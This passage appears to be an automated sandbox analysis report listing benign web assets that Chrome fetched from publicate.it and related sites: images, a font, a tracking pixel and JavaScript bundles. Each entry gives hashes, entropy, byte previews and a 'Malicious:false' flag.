                                                                                                                                                                                                        URL:https://tr-rc.lfeeder.com/?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0=
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5473
                                                                                                                                                                                                        Entropy (8bit):7.958350258957732
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:VWQNoXEBeV80PoF1+wJlwNrTMBCLpjxoDGCyunO1gxaoFmc:VWQ2XGeW0QFsFMBCBGDOunKgU1c
                                                                                                                                                                                                        MD5:40CF7EE7E79A93688B72A1FD460CE942
                                                                                                                                                                                                        SHA1:A5A557F41DA6BC141DD68142170AFA43996A189A
                                                                                                                                                                                                        SHA-256:CBAC6B16C3A2CA1AC95B089075CF21FE14A8128D22A080876BE23B13604EB18C
                                                                                                                                                                                                        SHA-512:C1423FBDB9418465D007A535F87629671B0C28622EAF3CBBFBB4EC971289C9F884992E44E769812F10B4BC615B61E03D011992B800D0176EC3B3DFCC036158EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^..xU....}..7..H.....,.h..|....(*o-`T.cf...6~..tp.bH(..`.j.."j......JE.. Ji..rs.^..s..1.s.=..&.}..A.'...^{....D3a.9.Q.QB^..).8........rv~.fq^q.-."......H...g.8. .?N.....iT.|f..hA.......b..3!&.t.TK{<d..F.A._K....Z.i+...wv..}.L..P...AE.6.5..gf...-..t$/OE"Gn quPq-..S....q..|.Z.i)._....)$2..[....C .?f.f/rZ.,...1.....d.q.Zx.C....v..-...8.JE.....$...s..fJ....s3....i.69....:B..@HH3.....v.*..>..!".6Y|...jj.:.....#.}.w..Nt.....M.\...A.IK?...rs.X....IBLx~.U..;...0......Q..V.O.......w..Po.b...!...$O.+z..."o..M8.....q..|.......".$^.b~.u.......["m>.J....Sf.E8......%T......\m.@&..(...x..H.i.-c........D......Zt\....Gz..R=..3.t.....Q.n..Mh.=.zf.N..."fc.bB../ .B-.;..8.....uW<.ZDk..wh..YT...I[.-+....J./.b.kW....._l..q.Q.\.......qy..].F..........I...)U"Cq...|3//...%$.%...0.../F........6.2W..9..Z.D..........j6.hm.h...>.B.>Q...$......a.y....]...F......ap.w.^C=y..so.a>...9....3.:...[[..C4...#y:...S.......sz..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 23736, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23736
                                                                                                                                                                                                        Entropy (8bit):7.992430272946195
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:384:Z9auu097JkkosFVZcRch7P2tJ9zR+c+pvPXnPP0Xdgr0rr69944PdreomKBgULc:ZMuR9FkkJVZLh7etJLrCPXAjY9reOgGc
                                                                                                                                                                                                        MD5:E2CAD968CB158B719D38375C5B4C2855
                                                                                                                                                                                                        SHA1:F70E8C03147ACCC3B9006A285998CB6C04CC19D9
                                                                                                                                                                                                        SHA-256:D32335C2C5FD5DE9EE5F3D3B1FE4D9DDE14AAD16EDA570A35018B0FF1DC093D2
                                                                                                                                                                                                        SHA-512:2FC86781ACCB6245F22D02E5AF7847C7CA5CDCB06CA39432B5EA35F7426A31B2EEE885AC926286F4EBCBF2DCDF92AFEC577298C1D58BBF588401295AA33FFF53
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_Gwft.woff2
                                                                                                                                                                                                        Preview:wOF2......\...........\Y..........................<.p.`..D....e.....T.....B..6.$..v. ..>..E.K.G.%c.m......6<.!l.h..-..cNx.`.....yGE..L....~...I8.).C1.i.Ia..n..K.*lB..l.;MQ.........]'.......`.0=+.....f".K...N&........EU.:.~/.~....T...H.^...M.gN4$.3I.%...*.J....e3bU.S......o.}...=.(...T..F.....4........92Fl.*..f...2`...Qc......X.......Qo.zo.q.zy=.CY...;3NK....*.v.....dOIJ..=...MU..e.J......].......'U?.}if...)..Hm.2>....!.v.m.M.t..m..6k..Z.%0.....T.b..............^...S..Y.nr.w4.s...W...(..~.m".f*........?.Tv.T....u.((.. y.&tDOW....W......Z..|..|.O*....$||...7..)%F....1.&z|{.....OQ8.T.....P....:.3|)9..n....t...".r......w?.....X. .P..7.B.m.s%...&....k-.;jj..9-(.O._.~i4...%.;l.<J.[.M....N..vhz.....X.#..b....J."..j....(P.......Ik....F.y..hk.............6h H..A..T"!....J.C.E.4.Ik.{.Igi.j.h.5.(=kB.LtIxY.w..avqz.Iv<..2g.R..../.+..I9.S.N....?Q#).......E;......... L.C4DK.,...J....K.!"s2.u.6..G.N.."V.1.<.fQ....*.M....|..A-...+[.Y...../?C.w(..9....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):86062
                                                                                                                                                                                                        Entropy (8bit):7.992258333420081
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:dPf5FDbC4HC2IpT6DC9XGpze6xw3+k5MLlwZs/Na0LkpnDiv2ISw7EJIfLapv7Ct:YFFpp93L3ELGZ+E0YUv2I3sIT3t
                                                                                                                                                                                                        MD5:11B64851C13A3485D02ECE05FE99EBEE
                                                                                                                                                                                                        SHA1:2975C415269AD823906121F37C7E2224CDF026C9
                                                                                                                                                                                                        SHA-256:BF205EB11E302A07064044B2A78B83F06480D2A884EFE1BDD9A913167FFEA513
                                                                                                                                                                                                        SHA-512:1D502BB9C4DBB6A02C099EF700DB9A58C6FBBF95DAFA3EF9CC1A7E733F8F04181BE32B0D7795B4FFEE167F4CFD47CDD282B9F99DF0702CDC01706AA14735246C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTELiq...............NNN.......0S..........?`.......>_.=^.>_......D........!Ab.:\............... @a....7Y#9.......>Zv.........",.."...........#....6K.....7Rp......j.f.,R.Ll38".6.............@......&F.;X.Ga.9A..}k$..<E#(V.,..HQ#3T..q_A...e.,.Xy........;.)Nx.cTs.p.HF 6.}B?.".Sp.FO.EH3%($8:T;7ARj1)D.Xr..XN...;60.bZRS/.v...9^.+17VQV...U\...iFJMe.......fM.#1c~Wu..zNO.v....US/?[.sX2)*...NNH&Fhf...N@..JbE.\\d|.aY^)`.DBV\_:CX73..wnmJo..lc7T.h..z{ygjeF>&.....LXx..)R.......K55...MKd.....q..,5LS?C.|.,?Hh.?Hf.yn?*$..'0E/...hhgx9?GC...Cc.]L:b7<...z..^fr...vc........UoMl{.t]]aYKgkP...YBNYi...htygg*r;6|oV...scAdh.Zm.2Cl...x2u....yu..............y..k.su."E]3)v.....Tf^.]?>UZ}.J.......2N.........y......*FE.3g......Q"#W....Mf...6.Nz..a.c..=...J|..+p..\.`hz....tRNS..........Ew..l......pHYs............... .IDATx...P......L.i..._..."..t..C <B.......[x0. . ,....v.01#.D#!.W08F.X.q.TP...1H.?.%.....&xpL^35irhO&...7k?..&....bVb..G...._{....z.]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 88, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5900
                                                                                                                                                                                                        Entropy (8bit):7.956543667137495
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:qAaCaPNGbg/KVZ3Dd2Ih9fXlnorSwu0kiqBi5aTNcDu6r0HC1XQ2UYsF3R:mCGB/QFDpTXlsSwu0kiqcamDu6UqsF3R
                                                                                                                                                                                                        MD5:5EF2BD628E2BD289851970DE76D3B57F
                                                                                                                                                                                                        SHA1:77E846020043C906C5A6700E4CD2F8347CF971F9
                                                                                                                                                                                                        SHA-256:8511F6D6F47D203F9DFD6CA9FF4D95C3F1B263AFBEE3AFEB2E963A425CCF1488
                                                                                                                                                                                                        SHA-512:48DEF95A888541319FF4BE3278ECCA1650F00BD74320097C36651854F6991293F42B2F2D8BF2B386C23C5C406E2856C1F0777A1EC986E818BD4FB6A7709A192A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...X.....>.3.....sRGB.........IDATx^.]..\E........^..g..A..6a'.......n.2.8...28...EQ.1....D.. ...&b.!@..%....y.....;...7..%...N.'.......N...m...wm.....Hy..x......Z.U!.%k..y....o..<...-..(..#.W....-...>X^v.....hQ..._s..>.Ux..........T.4F...a.]x.U.u..G........(...d.K..,...@..)....~.W.-..-..$...3B..i.......,]HKBH..T...E.....Z.y.\.@(.|..m.. e...a;.,'....,...CJ...M>?...M...Z.-G.#..3.8~....p|...c*J....v....b.37..A.EgEo..`.Z...aHU.%|XD\W..)...N>...&.....@y.G.....+Kh!.h.h-g..g..p.b..HFs}..(..Z. .J;.KG15..5.....D..X..a..O..:..!..%C(7...m.....8) ,..4..<uB.]r.'.y.&.K...h.47.km......gi./B...4,~..[.b.:.!..iw........M....+..S...~q+Fg|... 5............n.\..ST.Nv}..iy..!<./<..m....k-..\.@..M.z...bNI}.Z\.........O..6.......C..1.h.ZE,..... ..!5M. JE..0.h%T../Cye . t.s.t4,j..eE.RAH.i..M.......H.o.}.M..`%....n:...OD(....0.F+M..QW......mC..".G..."(mFPz....QP&.t/..4...;x(T.P......2.m#..G...!.....PA...x....C.w.&....-@X..B\t...&E..X.....1@.wnz4...A.+...\
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3140
                                                                                                                                                                                                        Entropy (8bit):5.057393408198499
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cPnsjx5Dmmeqbd0/M8iI84vC1eThiER0oEWuy0UldKHXfG77+8V:Q9VKd0k8pCUidUQ3fG77L
                                                                                                                                                                                                        MD5:78682C81D6DEED253A00DB3B7D08CFB8
                                                                                                                                                                                                        SHA1:BE3FCC8147B4E79378F2241B7B121BD576EF46D4
                                                                                                                                                                                                        SHA-256:40DDC2D2D5305190CA1750B85F870B7A1DE57621D46D6A6186D61127B61D814F
                                                                                                                                                                                                        SHA-512:850FB1EFA83616B057E7B37353454743089B8BE542DD09ADE51D238926577C631925420967FAC610568C24374AB428B463E9FAFC6D92982CD24AF953FE72D2BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/gmail_client.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>2</title>. <defs>. <path d="M9.21875,0 L108.78125,0 C113.872625,0 118,4.12737496 118,9.21875 L118,108.78125 C118,113.872625 113.872625,118 108.78125,118 L9.21875,118 C4.12737496,118 0,113.872625 0,108.78125 L0,9.21875 C0,4.12737496 4.12737496,0 9.21875,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" in2="SourceAlpha" op
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5331
                                                                                                                                                                                                        Entropy (8bit):7.391658200568043
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:uN26MT0D5MdtbZPAVwzVqEXw+r/urTVGEGcw5OPYwo5:hYNMtKwMAw+r/uVGtf
                                                                                                                                                                                                        MD5:62775A52BFD302D18CC4C3F412D5DC6D
                                                                                                                                                                                                        SHA1:93F521CA5F273FEB4FEE7E5C2A17D545156A6426
                                                                                                                                                                                                        SHA-256:73BF6CB46BC01325654DE980D918C150519743016D780A5509EBBAAD95729D4F
                                                                                                                                                                                                        SHA-512:25D261ABBD6E2B511CF67C2B00CD8AEA02ACE9287E69DCC8C0FC608AF12523261D003FCB9B30B7CC2ED277747A6CCB83C67ED7F8B0ADD783E583E628CE120CF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3474
                                                                                                                                                                                                        Entropy (8bit):4.6754679836176125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tvfc+6q8nQdBVvSl5CFbpbgLQqXRSwwTROSxdXZdDe:Dc+v8nQdbbpbiQERGROSPXZZe
                                                                                                                                                                                                        MD5:207813698A7A383DF704D68BBF035618
                                                                                                                                                                                                        SHA1:2E69A23FFEF22D7ACFD6D53AE7BB9BED8F03CC26
                                                                                                                                                                                                        SHA-256:67DE20A8953784456920A543B49EB2E9284CABF47138081D79DF540F1DEF1668
                                                                                                                                                                                                        SHA-512:D77D7AC183BAEA7010F0D0CB61FC95E8D27A8D8F5FF0DA33EA8BD38AC9758BDEA15768CED1E93871ECDF7BD67CDFC9AEB271672F5CD826DDDFA30D34238C0BAD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 1960.6 308.8" style="enable-background:new 0 0 1960.6 308.8;" xml:space="preserve">.<style type="text/css">...st0{fill:#53A318;}.</style>.<g>..<path class="st0" d="M976.2,307.6c66.2,0,110.3-42.9,110.3-115.3V7.1h-72.4v182.3c0,33.7-12.1,50.4-37.5,50.4...c-24.5,0-35-17.1-35-50.4V7.1h-72.8v185.2C868.9,266.3,909.2,307.6,976.2,307.6z"/>..<path class="st0" d="M1280.5,23.3c-20-14.1-43.7-16.2-74.9-16.2h-98.2V303h72.4v-95.3h20.8c30.8,0,54.1-2.1,72.9-13.3...c29.5-17.9,47-49.5,47-87.8C1320.5,69.5,1306.8,41.6,1280.5,23.3z M1194,143.6h-13.3V73.3h19.1c32.1,0,47.5,10,47.5,34.5...C1247.2,134.4,1229.8,143.6,1194,143.6z"/>..<polygon class="st0" points="1720.9,138.2 1831.2,303 1894.8,303 1894.8,7.1 1822.5,7.1 1822.5,171.5 1713.8,7.1 16
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):68076
                                                                                                                                                                                                        Entropy (8bit):5.253482511347538
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:bx5P+lx5LhQk+9dSwgx+DFF3rUMFWgqKh20zK5wd:bnmz5LhQk+9d6xwWP0u5+
                                                                                                                                                                                                        MD5:49CE5445DDCF5D24EF3BADC4EB1A11DD
                                                                                                                                                                                                        SHA1:DBE8CF782A53824BAC569AA3EA42992DD21064D6
                                                                                                                                                                                                        SHA-256:D70FA5DC6C8BFE9D7824BE31E669528533D0879A2B1600A7DF68B880F4D44296
                                                                                                                                                                                                        SHA-512:A720C00082E803A92EF54A1829BC845B187CD4544F5B202BC98F234A4FC9401EE76B21F8CB21E4C93F88B8DD8AA63D93A03DFF5A39570DA19EB6D105FFEC6683
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[26],{"8Sys":function(e,t,n){"use strict";n.d(t,"a",function(){return r}),n.d(t,"b",function(){return o});var r,o,i="undefined"!==typeof performance&&performance,a=i&&i.now?function(){return i.now()}:function(){return Date.now()};function throwIfEmpty(e){if(!e)throw new Error("name must be non-empty")}if(i&&i.mark)r=function mark(e){throwIfEmpty(e),i.mark("start "+e)},o=function stop(e){throwIfEmpty(e),i.mark("end "+e),i.measure(e,"start "+e,"end "+e);var t=i.getEntriesByName(e);return t[t.length-1]},function getEntries(){return i.getEntriesByType("measure")},function clear(){i.clearMarks(),i.clearMeasures()};else{var s={},c=[];r=function mark(e){throwIfEmpty(e);var t=a();s["$"+e]=t},o=function stop(e){throwIfEmpty(e);var t=a(),n=s["$"+e];if(!n)throw new Error("no known mark: "+e);var r={startTime:n,name:e,duration:t-n,entryType:"measure"};return function insertSorted(e,t){for(var n,r=0,o=e.length;r<o;)e[n=r+o>>>1].startTime<t.startTi
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4062
                                                                                                                                                                                                        Entropy (8bit):4.939675058013374
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:QVVKd0k8SD+/0J3Pb7J2uvL10E28Di118l84:gVKd0k8s+/0dPfJ2410EBi118l84
                                                                                                                                                                                                        MD5:0FD0AB8978487E37A3D52936BA858B69
                                                                                                                                                                                                        SHA1:941603FEDABFDC9A9BE532FC5C26E3182EF685E1
                                                                                                                                                                                                        SHA-256:0C7804B0B85F4FC4C464F6F9583D742D1A751E2B524C6674B480D5EA171E8D63
                                                                                                                                                                                                        SHA-512:2576824D1EA2C79322C9E96E57149A53FED81696BD1EC383DD350A7FFD05299976BA621EA1B2BDF2521BEBF4F59B3B8AB39D5B3385A0F9AC6B3D65DB019FD4F9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>8</title>. <defs>. <path d="M10.0731707,0 L107.926829,0 C113.490088,0 118,4.50991215 118,10.0731707 L118,107.926829 C118,113.490088 113.490088,118 107.926829,118 L10.0731707,118 C4.50991215,118 0,113.490088 0,107.926829 L0,10.0731707 C0,4.50991215 4.50991215,0 10.0731707,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):187623
                                                                                                                                                                                                        Entropy (8bit):5.526487574902686
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:b0YbrjYdB6s9EQYwV0mYrJ5Cz+joJW3Ko4lEZtNAJ06hg:ASAdB6siQeElEZtNAJ06G
                                                                                                                                                                                                        MD5:D09F4B656FE5F10583DDE42D442D33E3
                                                                                                                                                                                                        SHA1:BABFCB2AAA2C11A6BA98A2DFE3EA7E2982828891
                                                                                                                                                                                                        SHA-256:D2DF9409C89A1D0B6C148813804572F20AB9EF6FBC759914DCCA94C71BD8A0A7
                                                                                                                                                                                                        SHA-512:E80EAEFD81BD6601E8E9B8479A137A2A760D8FBC389D9898EC0890A6E97A7A548356D09DE2466B7A16B384446E8F6E5C59EC915283D28B40E3033E45D868438C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2358",. . "macros":[{"function":"__e"},{"function":"__dee"},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-MLNC5","function":"__c","vtp_value":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"vtp_component":0,"function":"__c","vtp_value":"Chrome"},{"function":"__c","vtp_value":false},{"function":"__gaoo_c","vtp_trackingId":"UA-126190-1"},{"function":"__ctto","vtp_isDynamic":false},{"function":"__sel","vtp_selector":":root"},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-T7B2D","function":"__c","vtp_value":false},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-58HW4","function":"__c","vtp_value":false},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-TBPTW","function":"__c","vtp_value":false},{"vtp_experimentKey":"OPT-T3XSLV5_OPT-MWLJH","function":"__c","vtp_value":false}],. "tags":[{"function":"__asprv","vtp_globalName":"google_optimize","vtp
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (36971), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):36971
                                                                                                                                                                                                        Entropy (8bit):5.351301646577381
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:sk2RSeHzFkFmnCrScQYcV6M6KpEHPAWuKuo:s9RSeHzuFECrScQYcV6M6KqHPAWuKF
                                                                                                                                                                                                        MD5:3140E272EE16AAB38C754A5045241AB2
                                                                                                                                                                                                        SHA1:D1F20D42C7F5F2100B3F0E675AB7EF7F13E4B684
                                                                                                                                                                                                        SHA-256:7AE98BF01803E672AA4F55AF9B060C99504335388AC5EA1C1574283CA86ABFDD
                                                                                                                                                                                                        SHA-512:8FD2A16F330694E671FDF28556D9253BE0CF3B90A2BCF73E7C27E0EECBA16390A88181B6E11201356D0C6A8BE18B87382F8D0770745851A69D8B4C3902121651
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/2322-f2a6ee33fa64d6ac.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2322],{10857:function(e,t,n){"use strict";n.d(t,{default:function(){return h}});var a=n(27573),i=n(38458),r=n(57908),o=n(34617),l=n(33588),s=n(81731),c=n(32012),d=n(79289),u=n(20857),m=n(48832),g=n(78713),v=n(95218);let p=()=>({name:"engagement_hover",engagement_component:"product_main-card",engagement_destination:"show_rating-breakdown",engagement_details:"hover_overall-rating"}),f=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;return{name:"engagement_product_click",engagement_component:"product_main-card",engagement_destination:e>=g.Qq?"go-to_reviews":"go-to_product-details_anchor-reviews",engagement_details:"text-link_review-count"}};var h=e=>{var t,n,h,_,w,x,b;let{product:j,facet:k}=e,{scrollY:y}=(0,m.Z)(),{deviceType:N}=(0,u.hU)();if(!j)return null;let{reviewSummary:P}=j,C=null!==(n=null==P?void 0:P.rating)&&void 0!==n?n:0,R=(null==j?void 0:null===(t=j.category)||void 0===t?void 0:t.htmlName)||"",Z
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21229)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):21230
                                                                                                                                                                                                        Entropy (8bit):5.307556199296145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:TRFZ2wWtdbD5ABwXwLrekrff8eTr+x5RxMc9n9LuJ4vV/:T8wAD5ABwXw+krfflyxzxVn9D/
                                                                                                                                                                                                        MD5:692A3714ECE78CEE4017020F5B18A203
                                                                                                                                                                                                        SHA1:56333F0F458776357A95BA474307C271DEC92280
                                                                                                                                                                                                        SHA-256:50377D1D3E7DCB2C8298FEB8D2505099DF1957E3700A358B993B4CF443FD36E8
                                                                                                                                                                                                        SHA-512:3AABA5FD4732DD120188F11C41A0D71C65B6C4C3AE6D0AB09B86D8491DB8F2F1658377F87CF2705D8764F55135F45D903C6CF5B40A95085E026FE69C1546BEA4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:var OneTrustStub=function(t){"use strict";var a,o,p=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.vendorsServiceData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(m=g=g||{})[m.Days=1]="Days",m[m.Weeks=7]="Weeks",m[m.Months=30]="Months",m[m.Years=365]="Years",(m=i=i||{}).Name="OTGPPConsent",m[m.ChunkSize=4e3]="ChunkSize
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12171), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12171
                                                                                                                                                                                                        Entropy (8bit):5.624089232766486
